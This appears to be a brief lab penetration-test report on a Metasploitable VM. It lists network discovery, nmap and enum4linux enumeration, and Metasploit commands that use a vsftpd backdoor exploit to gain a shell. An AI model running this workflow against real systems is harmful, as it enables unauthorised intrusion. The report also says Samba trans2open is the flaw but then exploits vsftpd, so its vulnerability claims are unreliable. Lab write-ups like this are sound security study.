Metasaploitable VM - A detailed penetration testing report covering enumeration, vulnerability analysis, and exploitation.
In this phase, I identified the target and scanned for open services.
I used ip addr show to indetify my IP Then netdiscover to find the target IP on the local NAT network.
- Command:
ip addr show192.168.2.4 - Command:
sudo netdiscover -r 192.168.2.4/24 - Evidence: View Ip address
- Evidence: View Devices
An aggressive Nmap scan revealed several interesting ports, including 80 (HTTP) and 139/445 (SMB).
- Command:
enum4linux 192.168.2.13 - Command:
nmap -A -p- 192.168.2.13 - Evidence: View Enumeration
- Evidence: View Nmap Scan
I identified an outdated version of Samba (2.2.1) which is vulnerable to a "trans2open" overflow.
- Command: Searchsploit Vsftpd 2.3.4
- Command: Load msfconsole & serach Vsftpd 2.3
- Evidence: View Searchsploit
- Evidence: View msfconsole search
I then set the Responding Host, Listening Host loaded the payload then proceeded to Run(exploit)
- Command:
use 0 (select backdoor exploit) - Command:
set RHOSTS 192.168.2.13 - Command:
exploit - Command:
ip addr show - Evidence: View Backdoor
- Evidence: View RHOSTS
- Evidence: View Exploit
- Evidence: Gained Shell